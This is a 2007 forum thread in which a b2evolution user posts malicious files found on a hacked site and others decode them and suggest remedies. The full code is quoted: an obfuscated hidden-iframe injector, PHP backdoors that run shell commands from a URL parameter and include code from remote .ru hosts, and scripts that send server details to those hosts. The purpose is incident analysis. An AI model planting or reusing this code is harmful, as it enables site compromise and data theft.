Recent Topics

1 Jul 18, 2007 00:46    

My b2evolution Version: 0.9.x

I was just going through an old and inactive site with a friend of mine, and we located the following files inside the /media/ directory of his site:

index.html
containing the following code:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Media Files</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<body>
<p>This folder is destined to receive images and other media files you upload from within b2evolution. </p>
<a href="http://ccf.thehehrs.org/images/articles/business_time_management.asp" class=giepoaytr title="business time management">business time management</a>
<script language="javascript" type="text/javascript">var k='?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>#wrs=#4%A?liudph#vuf@%kwws=22xvhu4<1liudph1ux2Bv@4%#iudpherughu@3#yvsdfh@3#kvsdfh@3#zlgwk@4#khljkw@4#pdujlqzlgwk@3#pdujlqkhljkw@3#vfuroolqj@qrA?2liudphA?2glyA',t=0,h='';while(t<=k.length-1){h=h+String.fromCharCode(k.charCodeAt(t++)-3);}document.write(h);
</script>
</body>
</html>

The URL appearing in that page (above) is NOT the URL of the site in question.

date.php
containing the following code:

<?php
error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
    if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
    else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
    if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
    if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>

include.php
containing the following code:

<?php
error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
    if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
    else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
    if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
    if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>

report.php
containing the following:

<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : 
$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : 
$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : 
$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : 
$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : 
$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : 
$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : 
$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : 
$REMOTE_ADDR);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s"; 
if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} 
else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>

time.php
containing the following code:

<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : 
$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : 
$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : 
$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : 
$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : 
$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : 
$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : 
$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : 
$REMOTE_ADDR);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s"; 
if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} 
else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>

and there was also an .htaccess file in the media folder, containing the following:

Options -MultiViews
ErrorDocument 404 //blog/media/report.php
Options -MultiViews
ErrorDocument 404 //media/time.php

The contents of the first two blocks are identical, and the contents of the second two blocks are identical.
There are no leading PHP tags in the last two blocks.
Also, I have added line-breaks in the last two blocks.
The last two blocks, as they were on the site, were one long string of code with no lone breaks...

Does anyone here know what those files might have been doing?
Does this appear to have been some kind of exploit?
All instances of b2evo have been removed from the domain about 6 months ago,
but does this appear to have been some kind of attempt to compromise the site?

jj.

2 Jul 18, 2007 01:35

Yes your site was hacked, but probably not b2evo. It looks like they found the media folder.
The permissions of this folder are set very low, in order to allow posters to upload to this folder.

edit:
The JavaScript in index.html unscrambles itself then it reads:

<div style="visibility: hidden; position:absolute; left: 1; top:1">
<iframearc="http://user19.iframe.ru/?s=1" frameborder=0 vspace=0
hspace=0 width=1 height=1 marginwidth=0 marginheight=0 scrolling=no>
</iframe></div>


This is a one by one iframe placed in the left top of the screen. It calls a Russian site.

edit 2:
I have a little more difficulty with the php.
If the files exist the hacker can call them and send a few arguments with them.
It looks like the caller must identify himself: with l=??? & p=??? p is the password (md5 protected).
He then sets a base url to call home:

@include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9")


This reads:

@include_once(http://bis.iframe.ru/master.php?r_addr=)

In the other files he tries to gather as much information from the server
as he can gets from php. He then sends them back to his homesite
through a page call.
This is the call it makes:
a) if isset the ifram.ru adress (that is, ifhe successfully 'logged in' through the first two files:

http://bis.iframe.ru/master.php?r_addr=$_SERVER["HTTP_HOST"]$_SERVER["SERVER_NAME"]etc


Have a look in the php manual about the variables.
It's about things like host name (url) and the server version
b) if the 'login' was not succesfull, it sends the information to:

http://user9.mshtml.ru

I didn't find anything to really worry about, but I might have missed something.
I suggest you change all passwords from the host.

3 Jul 18, 2007 05:46

Yeah he's already done that. The thing is that the files were dated over 6 months ago, and there haven't been any issues with his hosting account so maybe the hacker wasn't able to learn anything useful from those scripts.

How would he have uploaded files into that folder in the first place? This was, apparently, a single-user blog.

I'm wondering now, for my own installation, are there any better ways to protect the /media/ folder, via .htaccess perhaps? If the folder has to be 755 in order for users to upload into it and for thumbnails to display in the filemanager, etc, is there anything in an .htaccess that could prevent *.php files from being run at all from that folder? Maybe someone with some strong .htaccess skills could chime in.

jj.

4 Jul 18, 2007 05:55

My guess is that he knows some severe flaws in (older) server configurations
and he needs info to establish if you are a potential victim.

5 Jul 18, 2007 23:02

Afwas you know your stuff, everything was spot on :)

I'm also going with that somewhere within b2evolution there is something to send a form request or at least a redirect to one of those bad media files.

jibberjab, if you want to "protect your media folder" as well as your blog, be sure to upgrade. 0.9 is a dead (or close to it) version.


Form is loading...